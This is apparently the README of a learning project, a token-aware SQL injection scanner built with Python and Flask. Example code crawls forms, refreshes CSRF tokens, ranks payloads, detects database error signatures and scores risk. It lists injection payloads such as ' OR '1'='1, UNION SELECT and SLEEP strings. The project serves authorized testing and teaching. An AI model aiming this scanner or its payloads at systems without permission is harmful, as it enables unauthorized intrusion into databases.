A token-aware, AI-assisted SQL Injection (SQLi) scanner built with Python and Flask. It crawls web forms, intelligently ranks and injects SQL payloads, analyzes server responses for vulnerability indicators, and presents results through a clean web dashboard with AI-generated security conclusions.
- Token-Aware Form Submission — Automatically refreshes CSRF tokens and hidden fields before each injection attempt
- AI Payload Ranking — Scores and prioritizes payloads before testing (OR, UNION, quote-based)
- SQL Error Detection — Checks responses for known database error signatures (MySQL, PostgreSQL, SQLite, Oracle, MSSQL, ODBC)
- Time-Based Detection — Flags responses slower than 5 seconds as potential blind/time-based SQLi indicators
- Risk Scoring System — Calculates a numeric risk score (0–100) and maps it to HIGH / MEDIUM / LOW levels
- AI Security Analysis — Generates a dynamic human-readable conclusion per scan using real scan data
- Web Dashboard — Flask-based UI to run scans, view history, filter reports, and download JSON results
- Report Storage — Saves every scan as a numbered JSON file in the reports/ folder
- Multi-Scan Support — CLI scanner with AI ranking and report saving
- XSS-Safe Dashboard — All user-facing output is escaped to prevent reflected XSS in the UI
Project layout:

```text
Token-Aware-Mini-SQLi-Scanner/
│
├── app.py                    # Flask web dashboard (main entry point)
├── requirements.txt          # Python dependencies
├── pyproject.toml            # Project metadata and pytest config
│
├── sqli_scanner/             # Core scanner package
│   ├── __init__.py
│   ├── crawler.py            # Finds and parses HTML forms
│   ├── scanner.py            # Submits forms with payloads (token-aware)
│   ├── detector.py           # Detects SQL errors and computes risk scores
│   ├── timing_detector.py    # Flags abnormally slow responses
│   ├── token_extractor.py    # Extracts hidden/CSRF token values
│   ├── ai_engine.py          # Ranks payloads; generates AI verdict
│   ├── payloads.py           # Loads payloads from payloads.json
│   ├── payloads.json         # SQL injection payload list
│   ├── report.py             # Saves scan results as JSON files
│   └── web_scanner.py        # Scan orchestrator
│
├── scripts/                  # Command-line entry points
│   ├── mini_scan.py          # Lightweight CLI (no AI, no report saving)
│   ├── multi_scan.py         # Full CLI with AI ranking and reports
│   └── live_token_test.py    # Live token extraction test
│
├── lab/
│   └── server.py             # Local vulnerable test server (port 5001)
│
├── tests/                    # Automated tests
│   ├── fixtures/             # Sample HTML for unit tests
│   ├── test_ai.py
│   ├── test_detector.py
│   └── test_token.py
│
└── reports/                  # Auto-generated scan JSON files
    └── scan_1.json, scan_2.json ...
```
Scan flow:

```text
User enters URL
        │
        ▼
crawler.py          → Finds all <form> tags on the page
        │
        ▼
token_extractor.py  → Extracts fresh CSRF / hidden token values
        │
        ▼
ai_engine.py        → Ranks payloads by SQLi relevance score
        │
        ▼
scanner.py          → Submits each payload into every form field
        │
        ▼
detector.py /       → Checks the response for SQL error signatures
timing_detector.py    and abnormally slow timing
        │
        ▼
ai_engine.py        → Generates a human-readable AI verdict
        │
        ▼
report.py           → Saves the result to reports/scan_N.json
        │
        ▼
app.py              → Displays the result on the web dashboard
```
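The token-aware part of that flow (crawler, token extraction and submission building), as an added example rather than the project's own crawler.py / token_extractor.py / scanner.py. It parses forms with the standard-library `html.parser` instead of BeautifulSoup, and the rotating-token fetcher, the form's field names and the lab URL are constructed for the demo. The point it shows is why the page is re-fetched before every attempt: a cached token would be stale on the second submission.

```python
"""Token-aware form handling (added example, not the project's code)."""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Input types that never receive a payload; hidden fields are passed through.
NON_INJECTABLE = {"hidden", "submit", "button", "file", "checkbox",
                  "radio", "image", "reset"}


class FormParser(HTMLParser):
    """Collects every <form> on a page with its action, method and named fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "textarea", "select") and self._current is not None:
            if a.get("name"):
                self._current["fields"].append({
                    "name": a["name"],
                    "type": (a.get("type") or "text").lower(),
                    "value": a.get("value") or "",
                })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def parse_forms(html, base_url):
    """Return the forms found in `html`, with actions resolved against `base_url`."""
    parser = FormParser()
    parser.feed(html)
    for form in parser.forms:
        form["action"] = urljoin(base_url, form["action"])
    return parser.forms


def hidden_values(form):
    """Hidden fields (CSRF tokens and the like) exactly as the server rendered them."""
    return {f["name"]: f["value"] for f in form["fields"] if f["type"] == "hidden"}


def build_submissions(form, payload, filler="test"):
    """One request body per injectable field: the payload goes into that field,
    every other visible field gets a harmless filler, hidden fields are kept."""
    visible = [f["name"] for f in form["fields"] if f["type"] not in NON_INJECTABLE]
    submissions = []
    for target in visible:
        data = hidden_values(form)
        data.update({name: filler for name in visible})
        data[target] = payload
        submissions.append({"url": form["action"], "method": form["method"],
                            "field": target, "data": data})
    return submissions


def token_aware_submissions(fetch, url, payload):
    """Re-fetch the page, re-parse its forms and build submissions carrying the
    token from *this* fetch. Call it once per injection attempt, never with a
    cached page, so a rotating or single-use CSRF token is always current."""
    html = fetch(url)
    out = []
    for form in parse_forms(html, url):
        out.extend(build_submissions(form, payload))
    return out


def make_rotating_fetcher():
    """Constructed stand-in for the lab server: the CSRF token changes on every
    fetch, which is exactly the case a cached token fails on."""
    counter = {"n": 0}

    def fetch(url):
        counter["n"] += 1
        return f"""<html><body>
        <form action="/login" method="post">
          <input type="hidden" name="csrf_token" value="tok-{counter['n']}">
          <input type="text" name="username">
          <input type="password" name="password">
          <input type="submit" name="go" value="Login">
        </form></body></html>"""
    return fetch


if __name__ == "__main__":
    fetch = make_rotating_fetcher()
    for attempt in range(2):  # each attempt gets a fresh token
        for sub in token_aware_submissions(fetch, "http://127.0.0.1:5001/", "' OR '1'='1"):
            print(sub["field"], sub["data"])
```

In a real run `fetch` is a `requests.Session().get(url).text` call so that the session cookie the token is bound to travels with the submission; extracting the token from one session and submitting it in another is the usual reason a "token-aware" scanner still gets every request rejected.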
Requirements: Python 3.8+

```bash
# 1. Clone or extract the project
cd Token-Aware-Mini-SQLi-Scanner

# 2. Create and activate a virtual environment
python -m venv venv
venv\Scripts\activate        # Windows
# source venv/bin/activate   # macOS / Linux

# 3. Install dependencies
pip install -r requirements.txt
```

Start the dashboard:

```bash
python app.py
```

Open your browser at http://127.0.0.1:5000
From the dashboard you can:
- Enter a URL and start a scan
- View the latest scan result with AI Security Analysis
- Filter scan history by URL or risk level (HIGH / MEDIUM / LOW)
- Download the latest report as JSON
- Click any report file to view its full details
Start the local vulnerable lab server:

```bash
python lab/server.py
```

Open http://127.0.0.1:5001 and scan those pages with the main scanner.
CLI scanners:

```bash
python scripts/mini_scan.py
python scripts/multi_scan.py
```

Run the tests:

```bash
pytest
```

Risk scoring:

| Score Range | Risk Level | Meaning |
|---|---|---|
| 70 – 100 | HIGH | SQL error signature detected in the response |
| 30 – 69 | MEDIUM | Suspicious response timing (possible blind/time-based SQLi) |
| 0 – 29 | LOW | No indicators found |
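An added example of the detection and scoring stage (not the project's detector.py or timing_detector.py): the error signatures, the score weights and the `baseline` parameter are assumptions chosen to reproduce the table above, and the sample responses are constructed.

```python
"""SQL error signatures, timing flag and risk score (added example)."""
import re

# Constructed signature list: one regex family per engine the README names.
ERROR_SIGNATURES = {
    "MySQL": [r"You have an error in your SQL syntax",
              r"Warning: mysql_", r"MySQLSyntaxErrorException"],
    "PostgreSQL": [r"PostgreSQL.*ERROR", r"pg_query\(\)",
                   r"unterminated quoted string at or near"],
    "SQLite": [r"SQLite3::", r"sqlite3\.OperationalError",
               r"unrecognized token:"],
    "Oracle": [r"ORA-\d{5}", r"Oracle error"],
    "MSSQL": [r"Unclosed quotation mark after the character string",
              r"Microsoft OLE DB Provider for SQL Server",
              r"System\.Data\.SqlClient\.SqlException"],
    "ODBC": [r"\[Microsoft\]\[ODBC", r"ODBC SQL Server Driver"],
}
_COMPILED = {db: re.compile("|".join(f"(?:{p})" for p in pats), re.I)
             for db, pats in ERROR_SIGNATURES.items()}

SLOW_SECONDS = 5.0  # the README's time-based threshold


def find_sql_errors(body):
    """Engines whose error signature appears in the response body."""
    return [db for db, rx in _COMPILED.items() if rx.search(body)]


def is_slow(elapsed, baseline=0.0, threshold=SLOW_SECONDS):
    """Time-based indicator. `baseline` is the elapsed time of a benign request
    to the same form, so a slow host or network is not reported as blind SQLi."""
    return (elapsed - baseline) >= threshold


def risk_score(errors, slow):
    """Error match -> 70+, +10 per extra engine matched, +10 if also slow.
    Slow-only -> 40 (MEDIUM band). Nothing -> 0."""
    if errors:
        score = 70 + 10 * (len(errors) - 1)
        if slow:
            score += 10
        return min(score, 100)
    return 40 if slow else 0


def risk_level(score):
    if score >= 70:
        return "HIGH"
    if score >= 30:
        return "MEDIUM"
    return "LOW"


def analyze(body, elapsed, baseline=0.0):
    """Combine both detectors into the fields a report would carry."""
    errors = find_sql_errors(body)
    slow = is_slow(elapsed, baseline)
    score = risk_score(errors, slow)
    return {"errors": errors, "slow": slow,
            "risk_score": score, "risk_level": risk_level(score)}


# Constructed sample responses: (body, elapsed seconds, benign baseline seconds)
SAMPLES = [
    ("You have an error in your SQL syntax; check the manual", 0.3, 0.2),
    ("<h1>Welcome</h1>", 6.2, 0.2),      # slow, fast baseline: time-based hint
    ("<h1>Welcome</h1>", 6.2, 5.9),      # slow host: baseline cancels it
    ("ORA-01756: quoted string not properly terminated", 7.0, 0.2),
    ("Login failed", 0.2, 0.2),
]

if __name__ == "__main__":
    for body, elapsed, baseline in SAMPLES:
        print(analyze(body, elapsed, baseline))
```

Two caveats the table hides: a signature match is only an indicator, because a page that echoes the payload or documents database errors in its copy matches too; and without the baseline comparison a host that answers every request in six seconds makes every payload look like blind SQLi. Both are why the report's "manual verification" line is the real verdict.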
Example AI Security Analysis:

```text
The scanner found 5 form(s) and tested 20 payload(s).
Payload ' OR 1=1 -- generated a suspicious response.
Risk Score reached 35, indicating a potentially exploitable
SQL Injection weakness. Immediate manual testing is strongly recommended.
```
Default payloads (sqli_scanner/payloads.json):

```json
[
  "'",
  "\"",
  "' OR '1'='1",
  "\" OR \"1\"=\"1",
  "admin",
  "test"
]
```

You can add more payloads directly to sqli_scanner/payloads.json. They are automatically ranked before each scan.
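An added example of how a ranker of this kind scores payloads before a scan (not the project's ai_engine.py). The feature weights are assumptions, the UNION and SLEEP payloads are constructed additions to the default list, and `load_payloads` only reads a JSON array like the one above.

```python
"""Heuristic payload ranking (added example, not the project's ai_engine.py)."""
import json
import re

# Constructed feature weights: (pattern, weight, label). Higher total ranks first.
FEATURES = [
    (re.compile(r"\bUNION\b", re.I),                    4, "UNION-based"),
    (re.compile(r"\bOR\b", re.I),                       3, "OR-based"),
    (re.compile(r"SLEEP\(|pg_sleep\(|WAITFOR", re.I),   3, "time-based"),
    (re.compile(r"""['"]"""),                           2, "quote-based"),
    (re.compile(r"--|#|/\*"),                           1, "comment terminator"),
]


def score_payload(payload):
    """Return (score, matched feature labels) for one payload."""
    score, reasons = 0, []
    for rx, weight, label in FEATURES:
        if rx.search(payload):
            score += weight
            reasons.append(label)
    return score, reasons


def rank_payloads(payloads):
    """Highest score first. Duplicates are dropped; ties keep file order,
    which sorted() preserves because it is stable."""
    seen, unique = set(), []
    for p in payloads:
        if p not in seen:
            seen.add(p)
            unique.append(p)
    return sorted(unique, key=lambda p: -score_payload(p)[0])


def load_payloads(path):
    """Read a JSON array of strings, e.g. sqli_scanner/payloads.json."""
    with open(path, encoding="utf-8") as fh:
        data = json.load(fh)
    return [p for p in data if isinstance(p, str)]


# Constructed list: the README defaults plus two extra entries.
SAMPLE_PAYLOADS = ["'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1", "admin", "test",
                   "' UNION SELECT NULL--", "' AND SLEEP(5)--", "'"]

if __name__ == "__main__":
    for p in rank_payloads(SAMPLE_PAYLOADS):
        print(score_payload(p), repr(p))
```

Bare words such as `admin` and `test` score zero and sink to the bottom; they are still worth sending once, as the benign baseline request that the timing check needs.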
Example report (reports/scan_N.json):

```json
{
  "url": "http://example.com/login",
  "scan_time": "2026-06-12 19:29:00.123456",
  "ai_enabled": true,
  "forms_found": 2,
  "payloads_tested": 12,
  "best_payload": "' OR '1'='1",
  "risk_score": 70,
  "risk_level": "HIGH",
  "ai_summary": "[HIGH] Risk score 70. Most effective payload: ' OR '1'='1. A likely SQL Injection weakness was found. Manual verification is strongly advised."
}
```

This tool is built for authorized security testing and educational purposes only.
Do not scan any website or application without explicit permission from the owner.
Unauthorized scanning may be illegal under computer misuse laws in your country.
| Layer | Technology |
|---|---|
| Backend | Python 3, Flask |
| HTML Parsing | BeautifulSoup4 |
| HTTP Requests | Requests |
| Output Escaping | MarkupSafe |
| Data Storage | JSON files |
| Frontend | Plain HTML + CSS (served by Flask) |
Manu — TokenAwareSQLiScanner
Built as a project for learning web application security concepts.